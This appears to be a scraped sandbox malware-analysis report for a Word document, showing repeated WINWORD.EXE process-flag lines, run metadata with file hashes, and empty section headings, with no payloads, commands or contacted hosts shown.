Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior

ID:	696518
Product:	CloudBasic
Start time:	13:23:11
Start date:	02.09.2022
Sample:	nnxPt0Yydv.doc
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	15b691f0c5d627e71fed8a5d34fb0328
SHA1:	1c7cb38d8fc2f01a6331ade0fdf4cb9779a5ae74
SHA256:	3833142e8b5a9174615c83c1165fa67bd9f46a230058adf8fc9cbb081bb92d30
Filetype:	Word Microsoft Office Open XML Format document (49504/1) 49.01%

Windows Analysis Report
nnxPt0Yydv.doc

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Exploits

Compliance

Software Vulnerabilities

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report nnxPt0Yydv.doc

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Exploits

Compliance

Software Vulnerabilities

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
nnxPt0Yydv.doc